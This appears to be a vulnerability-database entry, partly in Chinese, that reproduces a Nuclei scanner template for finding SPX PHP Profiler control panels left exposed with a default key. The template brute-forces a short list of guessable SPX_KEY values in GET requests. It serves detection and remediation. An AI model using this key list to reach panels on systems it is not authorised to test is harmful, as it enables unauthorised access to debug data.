default-spx-key: SPX PHP Profiler - Default Key

日期: 2025-08-01 | 影响软件: SPX PHP Profiler | POC: 已公开

漏洞描述

SPX PHP profiler default spx key were discovered.

PoC代码[已公开]

id: default-spx-key

info:
  name: SPX PHP Profiler - Default Key
  author: vagnerd
  severity: high
  description: |
    SPX PHP profiler default spx key were discovered.
  remediation: |
    - https://github.com/NoiseByNorthwest/php-spx#security-concern
  reference:
    - https://github.com/NoiseByNorthwest/php-spx
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 11
  tags: spx-php,debug,misconfig,spx,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?SPX_KEY={{api_key}}&SPX_UI_URI=/"

    attack: batteringram
    payloads:
      api_key:
        - dev
        - devel
        - stg
        - stag
        - staging
        - prd
        - prod
        - production
        - test
        - testing
        - spx
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>SPX Control Panel</title>'
          - 'SPX_ENABLED'
          - "Configuration"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203d46d1ced3e1dac8ca9b8eb2520ab0eabaa4f2f9c9a237219093d1586e8835900221008a3e4f8cbb19af20ac468f0153fa45e10aaa18e4b66d1ef84e8a0c240f0b37cd:922c64590222798bb761d5b6d8e72950